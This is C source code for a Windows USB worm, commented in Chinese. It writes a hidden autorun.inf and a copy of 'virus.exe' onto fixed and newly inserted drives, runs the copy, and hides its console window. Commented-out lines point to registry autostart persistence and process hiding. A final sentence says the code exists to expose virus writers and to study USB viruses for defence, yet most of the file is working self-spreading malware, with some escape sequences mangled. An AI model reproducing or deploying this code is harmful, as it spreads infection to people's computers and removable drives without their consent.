// 设置连接器选项,告诉linker的入口,不要出现控制台
#pragma comment( linker, "/subsystem:/"windows/" /entry:/"mainCRTStartup/"" )
#define AUTORUN_INF "[autorun]/r/nopen=virus.exe/r/n"
int main(){
int disk,olddisk,i;
UINT Type;
char buf[MAX_PATH];
char filename[MAX_PATH];
DWORD dwWritenSize = 0;
disk = olddisk = GetLogicalDrives();
HMODULE module= GetModuleHandle(0);
GetModuleFileName(module,buf,sizeof(buf));
buf[3]=0;
printf("%s/n",buf);
if(GetDriveType(buf)==DRIVE_REMOVABLE){
for (i=0;i<32;i++)
{
if(disk&1){
sprintf(buf,"%c://",'A'+i);
Type = GetDriveType(buf);
// 取得驱动器的类型
if(Type==DRIVE_FIXED){
sprintf(filename,"%c://autorun.inf",'A'+i);
HANDLE hFile = CreateFile(filename,GENERIC_WRITE
,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN
|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM
|FILE_FLAG_WRITE_THROUGH,NULL);
WriteFile(hFile,AUTORUN_INF,sizeof(AUTORUN_INF),
&dwWritenSize,NULL);
CloseHandle(hFile);
sprintf(filename,"%c://virus.exe",'A'+i);
CopyFile("virus.exe",filename,FALSE);
}
}
disk>>=1;
}
//在注册表中加入自启动,比较危险,不建议调试
//RegOpenKey(HKEY_LOCAL_MACHINE,"Software//Microsoft//Windows//CurrentVersion//Run",&RegKey);
//这里加上你需要在注册表中注册的内容
//RegSetValueEx(RegKey,"getip",0,REG_SZ,(const unsigned char*)(LPCTSTR)fullName,fullName.GetLength());
//然后调用远程线程注入函数CreateRemoteThread在进程管理器中隐藏进程
//为了防止该程序被恶意使用,我在这里就不讲解,以省略号代替之
//......
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si,sizeof(si));
si.cb = sizeof(si);
CreateProcess(NULL,"c://virus.exe",NULL,NULL,FALSE
,NORMAL_PRIORITY_CLASS,NULL,NULL,&si,&pi);
}
else{
while (true)
{
disk = GetLogicalDrives();
if(disk>olddisk){
disk-=olddisk;
i=0;
while(disk>>=1)i++;
sprintf(filename,"%c://autorun.inf",'A'+i);
HANDLE hFile = CreateFile(filename,GENERIC_WRITE
,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN
|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM
|FILE_FLAG_WRITE_THROUGH,NULL);
WriteFile(hFile,AUTORUN_INF,sizeof(AUTORUN_INF),
&dwWritenSize,NULL);
CloseHandle(hFile);
sprintf(filename,"%c://virus.exe",'A'+i);
CopyFile("virus.exe",filename,FALSE);
}
olddisk = disk;
Sleep(10);
}
}
return 0;
}
为了揭露病毒制作者的丑恶行径,决定研究U盘病毒的结构,以更好地防毒。